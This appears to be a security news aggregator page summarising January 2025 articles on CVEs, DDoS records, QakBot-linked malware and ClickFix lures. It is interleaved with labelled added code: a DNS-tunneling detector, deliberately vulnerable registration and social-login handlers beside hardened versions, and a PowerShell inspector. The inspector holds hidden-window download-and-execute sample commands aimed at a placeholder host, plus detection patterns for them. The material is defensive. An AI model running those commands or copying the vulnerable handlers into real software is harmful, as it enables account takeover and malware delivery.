Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12822
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-01-23 10:28:46 | thehackernews | MALWARE | SonicWall Alerts to Critical Flaw in SMA 1000 Appliances | SonicWall has issued a critical alert for a security vulnerability in its SMA 1000 series, identified as CVE-2025-23006.
This flaw, with a severity rating of 9.8/10 on the CVSS scale, could allow unauthenticated remote attackers to execute arbitrary OS commands.
The vulnerability specifically affects the Appliance Management Console (AMC) and Central Management Console (CMC) within the SMA 1000 appliances.
SonicWall has addressed the issue in version 12.4.3-02854 (platform-hotfix) and urged customers to promptly apply this patch.
There have been reports of possible active exploitation of this vulnerability in the wild.
The vulnerability does not impact SonicWall's Firewall and SMA 100 series products.
Microsoft Threat Intelligence Center (MSTIC) was credited with discovering and reporting the vulnerability.
SonicWall recommends restricting access to the AMC and CMC to trusted sources to minimize potential impacts. | Details |
| 2025-01-23 10:23:29 | theregister | DDOS | Record-Breaking DDoS Attack Thwarted by Cloudflare in 2024 | In 2024, Cloudflare countered 21.3 million DDoS attacks, marking a 53% increase from the previous year.
The largest attack, on October 29, 2024, came from a Mirai-variant botnet of over 13,000 IoT devices and peaked at 5.6 Tbps.
It targeted an ISP in Eastern Asia and set a new record, surpassing the previous high of 3.8 Tbps.
Cloudflare's report also highlights a shift toward shorter attacks: 72% of HTTP DDoS attacks ended within ten minutes, too fast for manual intervention.
Customers indicated competitors (40%), state-sponsored groups (17%), and disgruntled users (17%) as primary suspects behind attacks.
There was also a noted increase in ransom-related DDoS attacks, with a 78% rise in incidents demanding ransom payments during Q4. | Details |
| 2025-01-23 10:18:10 | thehackernews | DATA BREACH | Widespread Unauthorized Data Access in Top Industry Websites | Research from Reflectiz finds that 45% of third-party web applications access sensitive user data without a legitimate need; in retail, 53% of risk exposures stem from tracking tools.
Reflectiz, a web exposure management firm, conducted research analyzing the top websites in various sectors, revealing substantial vulnerabilities.
The prevalent misuse of tracking apps like Facebook and TikTok pixels leads to unauthorized collection of private user information.
Entertainment and online retail sectors should critically assess third-party app permissions to minimize unnecessary sensitive data access and reduce risk.
Less popular apps are considered higher risk, lacking robust security updates and community vetting, which could lead to compromised user data security.
The report encourages organizations to tailor risk management to their sector's specific risk variables and context, scored using Reflectiz's Exposure Rating.
Business sectors such as education and publishing are advised to focus on training and adopting best practices, especially in departments likely to initiate risky exposures. | Details |
| 2025-01-23 09:47:40 | thehackernews | MALWARE | Enhanced BC Malware Linked to QakBot Features New Capabilities | Researchers have detailed a new BackConnect (BC) module associated with the QakBot ecosystem that adds DNS tunneling and remote access capabilities.
Researchers discovered that the new BackConnect (BC) module was used alongside known malware like DarkVNC and IcedID, primarily to maintain persistence and manage command and control communications.
This advanced BC module was detected on the same infrastructure that supports ZLoader, suggesting closely linked cybercriminal operations.
Following the 2023 law enforcement intervention which disrupted QakBot's operations, subsequent analyses have shown that QakBot's framework continues to evolve, now including features to collect detailed system information.
The BC module functions as a standalone backdoor, giving attackers direct access to the host and collecting system information to inform follow-on activity.
Independent investigations by Sophos correlated the malware artifacts to specific cybercriminal groups known for sophisticated phishing and ransomware attacks.
The intertwining of various criminal elements, such as the deployment of other malware types and the use of Microsoft services for phishing attacks, highlights a complex and collaborative cybercriminal infrastructure. | Details |
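DNS tunneling, as used by the BC module above, shows up in query logs as many unique, long, high-entropy subdomains under one apex domain, often over TXT or NULL record types. The following detector is an added example (not code from the article, the researchers, or any vendor): it scores each apex in constructed query-log lines on those features. The log format (`<timestamp> <client> <qtype> <qname>`), the thresholds, and the "apex = last two labels" rule are assumptions for illustration; a production detector would use the public-suffix list and tuned thresholds.

```python
"""Heuristic DNS-tunneling detector over a flat query log (added example)."""
import math
from collections import defaultdict

# Constructed sample log: benign lookups for example.com/.net plus a burst of
# long hex-encoded labels under badcorp.example, the shape of a DNS tunnel.
SAMPLE_LOG = """\
1737630000 10.0.0.5 A www.example.com
1737630001 10.0.0.5 AAAA mail.example.com
1737630002 10.0.0.5 A api.example.com
1737630002 10.0.0.9 A cdn.example.net
1737630003 10.0.0.7 TXT 4a6f686e2d446f652d313233343536.t.badcorp.example
1737630004 10.0.0.7 TXT 9f8e7d6c5b4a3928171605f4e3d2c1b0.t.badcorp.example
1737630005 10.0.0.7 NULL aabbccddeeff00112233445566778899aabbccdd.t.badcorp.example
1737630006 10.0.0.7 TXT 0123456789abcdef0123456789abcdef0123.t.badcorp.example
1737630007 10.0.0.7 TXT zz99yy88xx77ww66vv55uu44tt33ss22rr11.t.badcorp.example
"""

# Record types that carry bulk data and are rare for ordinary client lookups.
SUSPICIOUS_QTYPES = {"TXT", "NULL"}


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payloads sit well above natural hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (apex, subdomain_labels). Assumes apex = last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), []
    return ".".join(labels[-2:]), labels[:-2]


def parse_log(text: str):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the whole run
        ts, client, qtype, qname = parts
        records.append({"ts": int(ts), "client": client,
                        "qtype": qtype.upper(), "qname": qname})
    return records


def score_apexes(records):
    """Per-apex features: query volume, subdomain uniqueness, label length,
    label entropy and share of bulk-data record types."""
    per_apex = defaultdict(list)
    for r in records:
        apex, sub = split_name(r["qname"])
        per_apex[apex].append((sub, r["qtype"]))
    stats = {}
    for apex, items in per_apex.items():
        subs = [".".join(sub) for sub, _ in items]
        longest = [max((len(l) for l in sub), default=0) for sub, _ in items]
        ent = [shannon_entropy(max(sub, key=len)) if sub else 0.0 for sub, _ in items]
        n = len(items)
        stats[apex] = {
            "queries": n,
            "unique_ratio": len(set(subs)) / n,
            "mean_longest_label": sum(longest) / n,
            "mean_entropy": sum(ent) / n,
            "suspicious_qtype_ratio": sum(q in SUSPICIOUS_QTYPES for _, q in items) / n,
        }
    return stats


def detect_tunnels(text, min_queries=3, min_label=20, min_entropy=3.0, min_unique=0.9):
    """Flag apexes whose subdomains look like encoded data: long labels plus
    either near-unique high-entropy names or mostly TXT/NULL queries."""
    flagged = []
    for apex, s in score_apexes(parse_log(text)).items():
        if s["queries"] < min_queries:
            continue
        long_labels = s["mean_longest_label"] >= min_label
        encoded = s["unique_ratio"] >= min_unique and s["mean_entropy"] >= min_entropy
        bulk_rrtype = s["suspicious_qtype_ratio"] >= 0.5
        if long_labels and (encoded or bulk_rrtype):
            flagged.append(apex)
    return sorted(flagged)


if __name__ == "__main__":
    for apex, s in score_apexes(parse_log(SAMPLE_LOG)).items():
        print(apex, s)
    print("flagged:", detect_tunnels(SAMPLE_LOG))
```

The length and uniqueness features matter more than the record type: a tunnel can run entirely over A or AAAA queries by encoding data in the name and the answer, so a detector keyed only on TXT/NULL misses it.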
| 2025-01-23 09:32:14 | theregister | MISCELLANEOUS | Decline in UK Tech Startups Amid Economic Challenges in 2024 | The number of new tech companies formed in the UK fell 5% in 2024 compared with the previous year, the sector's first contraction since 2020.
This downturn is attributed to a combination of factors including high inflation, rising interest rates, and significant tax increases which have negatively impacted business confidence and economic conditions.
The UK government is attempting to counter these challenges by leveraging AI technology and involving tech giants in regulatory processes, aiming to stimulate economic growth and productivity.
The increase in corporation tax from 19% to 25% for companies with profits over £250,000 has placed additional financial strain on businesses, alongside scheduled hikes in National Insurance contributions.
Significant declines in tech company formations were particularly noted in Wales and the southwest of England, with London also experiencing a drop for the first time in five years.
The uncertainty and cautious outlook in UK tech boardrooms are also being fueled by external factors such as potential US policy changes and tariffs.
The lack of immediate government plans surrounding AI investment details has left tech businesses in a state of uncertainty, contributing further to the challenging environment. | Details |
| 2025-01-23 07:25:45 | theregister | MALWARE | AMD Processor Security Flaw Unveiled by Premature ASUS Update | A microcode signature verification vulnerability has been identified in AMD processors.
The issue came to light after Asus released a beta BIOS update whose release notes mentioned a fix for the flaw before AMD had published anything.
Microcode updates are normally applied only by firmware or the OS kernel and must be vendor-signed; if signature verification can be bypassed, an attacker could load malicious microcode onto the CPU.
The flaw has not been characterised as highly critical, but AMD is concerned about counterfeit patches and misinformation circulating ahead of official guidance.
The vulnerability requires local administrator access and specialized malicious microcode to be exploited effectively.
AMD confirms ongoing development of official patches and advises adherence to standard security practices and trusted sources.
AMD is coordinating with partners to deploy mitigations and plans to release detailed guidance and mitigation options soon.
The exact AMD products affected are not yet disclosed, leading to some speculation in the cybersecurity community. | Details |
| 2025-01-23 06:24:52 | thehackernews | CYBERCRIME | Cisco Addresses Critical Flaws and National State Hacks Revealed | Cisco has patched a critical flaw (CVE-2025-20156, CVSS 9.9) in the REST API of Cisco Meeting Management that lets a remote, authenticated attacker with low privileges escalate to administrator.
Another vulnerability in Cisco's BroadWorks was fixed, preventing denial-of-service (DoS) attacks triggered by SIP request overloads (CVE-2025-20165, CVSS 7.5).
Cisco also resolved an integer underflow issue in ClamAV that could lead to DoS conditions (CVE-2025-20128, CVSS 5.3).
CISA and the FBI also released details of exploit chains used by nation-state actors against Ivanti Cloud Services Appliance (CSA), combining multiple CVEs to gain initial access and run malicious activity on the network.
The disclosed chains were used for credential theft, remote code execution, and attempts to maintain persistence in compromised networks.
Cisco's prompt patches underscore the importance of rapid vulnerability management for network infrastructure.
Administrators are advised to apply the updates and review the Ivanti CSA indicators to prevent exploitation. | Details |
| 2025-01-23 05:39:14 | thehackernews | CYBERCRIME | TRIPLESTRENGTH Exploits Cloud Platforms for Cryptojacking and Ransomware | Google identified a financially motivated threat actor named TRIPLESTRENGTH targeting cloud environments for cryptojacking and on-premise ransomware attacks.
The threat actor uses stolen credentials and session cookies, some obtained from Raccoon infostealer logs, to access cloud instances on Google Cloud, AWS, and Microsoft Azure.
TRIPLESTRENGTH uses these hijacked environments to mine cryptocurrencies using the unMiner application and the unMineable mining pool.
Apart from cryptojacking, TRIPLESTRENGTH also engages in ransomware attacks on on-premise resources, using variants such as Phobos and LokiLocker.
The group advertises access to compromised cloud servers on Telegram and recruits partners for further ransomware and extortion schemes.
In response, Google says it has enforced multi-factor authentication (MFA) and improved logging for sensitive billing actions.
The attacks demonstrate the significant risks associated with stolen credentials, leading to a cascade of unauthorized access and data breaches. | Details |
| 2025-01-23 01:11:30 | theregister | DATA BREACH | Oracle Releases 603 Patches, Highlights Critical Vulnerabilities | Oracle issued a significant update with 603 patches, including 318 for its own products and 285 for associated Linux code.
The headline fix is CVE-2025-21556 in Oracle's Agile PLM Framework, rated 9.9 on the CVSS scale and exploitable over the network by a low-privileged attacker.
Another urgent update addresses CVE-2024-45492 in the XML parsing library libexpat, which affects several Oracle products and recently had its severity rating raised to 9.8.
The patch update also includes fixes for high-risk vulnerabilities in Oracle Communications, Financial Services, Middleware, and Oracle Analytics platforms.
High-severity issues addressed include a use-after-free bug in Oracle Analytics and a critical remote exploitation flaw in the OPERA hotel management application.
There were also numerous patches for Oracle’s JD Edwards, MySQL, and PeopleSoft platforms, targeting critical vulnerabilities that could enable data theft or system crashes.
Additionally, Oracle improved security for its Linux distributions, releasing patches to address vulnerabilities in libraries like gstreamer1-plugins-base which had memory corruption risks. | Details |
| 2025-01-22 23:00:06 | bleepingcomputer | CYBERCRIME | Critical Security Flaws Found in Popular WordPress Real Estate Plugins | Two critical vulnerabilities have been identified in the RealHome theme and Easy Real Estate plugins for WordPress, potentially allowing unauthorized administrative access.
The vulnerabilities were discovered by Patchstack in September 2024, but InspiryThemes has not responded to the security notifications or released any fixes.
The RealHome theme flaw lets unauthenticated users register as administrators because the registration function does not validate the role the client requests.
The Easy Real Estate plugin flaw allows attackers to gain administrative access via the social login feature without proper email verification.
Both flaws carry a high severity rating (CVSS 9.8) and pose significant risks of site takeover, data manipulation, and unauthorized access to sensitive data.
Despite three new releases since Patchstack's report, none addresses these flaws.
Immediate mitigation is to disable the affected theme and plugin and turn off user registration until a fix is available.
These vulnerabilities affect approximately 32,600 websites using the RealHome theme, underscoring the widespread risk to real estate platforms. | Details |
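The two bug classes above, a registration handler that trusts a client-supplied role and a social login that links accounts on an unverified e-mail, are modelled below in Python as an added example. This is not the RealHome or Easy Real Estate code; it assumes a minimal in-memory user store, an OAuth-style profile dictionary with `provider`, `sub`, `email` and `email_verified` fields, and a hypothetical `SELF_SERVICE_ROLES` allowlist.

```python
"""Vulnerable and hardened account-creation paths (added illustrative model)."""
from dataclasses import dataclass, field


@dataclass
class User:
    email: str
    role: str
    linked_identities: set = field(default_factory=set)  # {(provider, sub)}


class UserStore:
    """Tiny in-memory stand-in for the application's user table."""

    def __init__(self):
        self.users = {}

    def create(self, email, role):
        if email in self.users:
            raise ValueError("email already registered")
        self.users[email] = User(email=email, role=role)
        return self.users[email]

    def find_by_email(self, email):
        return self.users.get(email)


# Roles a visitor may pick for themselves (assumed for illustration).
SELF_SERVICE_ROLES = {"subscriber", "agent"}


def register_vulnerable(store, form):
    """Copies whatever role the (unauthenticated) client sent into the account,
    so a POST with role=administrator creates an administrator."""
    return store.create(form["email"], form.get("role", "subscriber"))


def register_hardened(store, form):
    """Only allowlisted roles may be self-assigned; anything else is refused."""
    role = form.get("role", "subscriber")
    if role not in SELF_SERVICE_ROLES:
        raise PermissionError(f"role {role!r} cannot be self-assigned")
    return store.create(form["email"], role)


def social_login_vulnerable(store, profile):
    """Logs in whoever owns the e-mail the identity provider reports, without
    checking that the provider verified it. An attacker who registers an IdP
    account using a site admin's address is logged in as that admin."""
    user = store.find_by_email(profile["email"])
    return user or store.create(profile["email"], "subscriber")


def social_login_hardened(store, profile):
    """Require a provider-verified e-mail, and never attach a new external
    identity to an existing account on e-mail alone."""
    if not profile.get("email_verified"):
        raise PermissionError("identity provider did not verify this e-mail")
    identity = (profile["provider"], profile["sub"])
    user = store.find_by_email(profile["email"])
    if user is None:
        user = store.create(profile["email"], "subscriber")
        user.linked_identities.add(identity)
        return user
    if identity not in user.linked_identities:
        # The account owner must authenticate with their password before
        # this identity can be linked; see-also: explicit linking flow.
        raise PermissionError("existing account; link identity after password login")
    return user


def denied(fn, *args):
    """True if the call is rejected with PermissionError."""
    try:
        fn(*args)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    store = UserStore()
    store.create("owner@example.test", "administrator")
    # Constructed attacker inputs.
    reg = {"email": "attacker@example.test", "role": "administrator"}
    spoof = {"provider": "acme-idp", "sub": "999",
             "email": "owner@example.test", "email_verified": False}
    print("vulnerable registration role:", register_vulnerable(store, reg).role)
    print("hardened registration denied:", denied(register_hardened, store, reg))
    print("vulnerable social login as:", social_login_vulnerable(store, spoof).role)
    print("hardened social login denied:", denied(social_login_hardened, store, spoof))
```

The hardened social login is stricter than simply checking `email_verified`: even a verified address from one provider says nothing about who owns the existing local account, so linking always goes through an authenticated session.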
| 2025-01-22 21:33:56 | theregister | NATION STATE ACTIVITY | Trump's Early Actions Weaken US Cyber Defenses Against China | The Trump administration dismissed all members of key Department of Homeland Security cyber advisory boards early in its tenure.
This decision included the disbandment of the Cyber Safety Review Board amidst active investigations into major cyber incidents impacting American infrastructure.
The House Committee on Homeland Security, in its first hearing since Trump took office, heard from expert witnesses about significant vulnerabilities in America’s cyber defense against Chinese attacks.
Experts testified that Chinese hackers have deeply penetrated American networks and are prepping for potentially destructive activities aligned with geopolitical conflicts, notably around Taiwan.
Retired Rear Admiral Mark Montgomery highlighted the strategic cybersecurity threats from China, particularly through the Volt Typhoon operation aimed at crippling U.S. military mobilization capabilities.
Witnesses also argued that these Chinese operations are a prelude to a likely military conflict over Taiwan, which Chinese leadership has reportedly set as a readiness goal for 2027.
The dissolution of cybersecurity advisory boards is seen as reducing America’s readiness to respond to or prevent future cyberattacks from foreign adversaries. | Details |
| 2025-01-22 21:33:56 | bleepingcomputer | DATA BREACH | Researcher Exploits Cloudflare CDN Flaw to Track User Locations | A flaw in Cloudflare's CDN lets an attacker learn a target's approximate location by sending them an image through chat apps such as Signal and Discord, which serve attachments via Cloudflare's cache.
The vulnerability allows tracking within a 250-mile radius, not precise enough for street-level detail but adequate for determining a user’s region.
Despite the location tracking not requiring any action from the user (termed a "0-click attack"), it raises significant privacy concerns, especially for journalists, activists, and others prioritizing anonymity.
The method involves using a bug in Cloudflare Workers to route requests through specific data centers, then mapping responses to these locations.
Originally, Cloudflare confirmed and resolved the issue, rewarding the researcher with $200, but the researcher later demonstrated continued viability of location tracking using a VPN.
Both Signal and Discord have dismissed responsibility for the flaw, referring back to Cloudflare, which asserts users should disable caching if concerned.
The precision of location tracking is higher in urban areas compared to rural settings due to the proximity and number of Cloudflare data centers. | Details |
| 2025-01-22 20:38:10 | bleepingcomputer | MALWARE | Malicious Telegram Captcha Lures Users into Installing Malware | Threat actors exploit news around Ross Ulbricht's pardon to distribute malware through a fake Telegram channel.
Users are tricked into running malicious PowerShell scripts presented as a captcha or verification step.
The attackers use the "Click-Fix" technique, disguising harmful commands as a security check the user must complete.
CAPTCHA verification pages prompt users to execute PowerShell commands, leading to a ZIP file download containing the malware.
The downloaded malware includes a potential Cobalt Strike loader, increasing the risk of remote system access and subsequent ransomware or data theft.
The attack is propagated through misuse of verified accounts on social platforms, including Telegram channels.
Detailed instructions within the fake verification process are carefully worded to avoid raising user suspicions.
General security advice includes scrutinizing any PowerShell commands copied from the internet, especially if they seem to obfuscate their function. | Details |
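The advice to scrutinize pasted PowerShell is easier to follow with a checker that decodes `-EncodedCommand` payloads and flags the usual ClickFix ingredients (hidden window, no profile, policy bypass, download-and-execute, archive extraction). The script below is an added example, not code from the article or from any vendor; its indicator list and the two malicious sample commands are constructed for illustration, and the encoded sample is built at import time so no real payload is embedded.

```python
"""Inspect copy-and-run PowerShell one-liners for ClickFix indicators (added example)."""
import base64
import re

# Indicator -> meaning. Each is a regex; (?i) makes it case-insensitive.
INDICATORS = {
    r"(?i)\b(iex|invoke-expression)\b": "executes downloaded or decoded text",
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer":
        "fetches content from the network",
    r"(?i)-(w|win|windowstyle)\s+hidden": "hides the console window",
    r"(?i)-(nop|noprofile)\b": "skips the user profile",
    r"(?i)-(ep|executionpolicy)\s+bypass": "bypasses execution policy",
    r"(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}": "base64-encoded payload",
    r"(?i)expand-archive|\.zip\b": "unpacks an archive (staged payload)",
    r"(?i)\bmshta\b|\brundll32\b|\bregsvr32\b": "LOLBin launcher",
}

ENC_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmd: str):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return it or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_command(cmd: str):
    """Return decoded payload (if any), matched indicators and a verdict."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    findings = [meaning for pattern, meaning in INDICATORS.items() if re.search(pattern, text)]
    if len(findings) >= 2:
        verdict = "block"
    elif findings:
        verdict = "review"
    else:
        verdict = "allow"
    return {"decoded": decoded, "findings": findings, "verdict": verdict}


# Constructed samples. The "malicious" URL host is the reserved .invalid TLD.
SAMPLE_BENIGN = "Get-ChildItem -Recurse | Measure-Object"
SAMPLE_CLICKFIX = (
    "powershell -w hidden -nop \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/v.ps1')\""
)
_INNER = "iex (iwr http://example.invalid/s.zip)"
SAMPLE_ENCODED = (
    "powershell -nop -w hidden -ep bypass -enc "
    + base64.b64encode(_INNER.encode("utf-16-le")).decode("ascii")
)

if __name__ == "__main__":
    for name, cmd in [("benign", SAMPLE_BENIGN), ("clickfix", SAMPLE_CLICKFIX),
                      ("encoded", SAMPLE_ENCODED)]:
        r = inspect_command(cmd)
        print(f"{name}: {r['verdict']} {r['findings']} decoded={r['decoded']!r}")
```

A single hit (say, a legitimate `Invoke-WebRequest` in an install script) only earns "review"; it is the combination of concealment flags with a download-and-execute stage that characterises the lure described above.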
| 2025-01-22 19:47:28 | theregister | CYBERCRIME | Widespread Cyberattack Targets Chrome Extension Developers | Sekoia has identified a supply chain attack impacting developers of Chrome browser extensions, affecting potentially millions of end users.
Phishing tactics and OAuth abuses were employed to inject malicious code into the Chrome Web Store, compromising various popular extensions.
Victims include companies like Cyberhaven, which detected unauthorized activities during the holiday season, linking the attack to a broader phishing campaign analyzed by Booz Allen Hamilton.
A purposeful phishing operation targeted extension developers via emails posing as official Chrome Web Store communications, urging developers to click malicious links.
Through the compromised developer accounts, attackers uploaded tainted versions of extensions such as Reader Mode, whose developer disclosed a compromise affecting around 300,000 users.
Sekoia's investigation traced back the phishing campaign to similar attacks starting from 2023, utilizing domain names and infrastructure consistently linked to earlier incidents.
Analysis suggests that this specialization in Chrome extension attacks could result in wide-scale harvesting of sensitive user data, as evidenced by compromised extensions collecting API keys and session cookies from major platforms like ChatGPT and Facebook for Business. | Details |
| 2025-01-22 18:51:43 | bleepingcomputer | DDOS | Cisco Releases Patches for ClamAV Denial-of-Service Vulnerability | Cisco has issued security updates for a Denial-of-Service (DoS) vulnerability in ClamAV, tracked as CVE-2025-20128 (CVSS 5.3).
The vulnerability stems from a heap-based buffer overflow in the OLE2 decryption routine, allowing remote, unauthenticated attacks.
Attackers could exploit this flaw by submitting a specially crafted file with OLE2 content, potentially halting the ClamAV antivirus scanning process.
Despite the availability of proof-of-concept (PoC) exploit code, there have been no reported cases of active exploitations in the wild.
Affected software includes the Secure Endpoint Connector for Linux, Mac, and Windows, which integrates with SIEM systems like Microsoft Sentinel.
Cisco also addressed additional vulnerabilities in its products, including other DoS and privilege escalation issues in various software.
The company reassures users that overall system stability remains intact, even if the vulnerability is successfully exploited. | Details |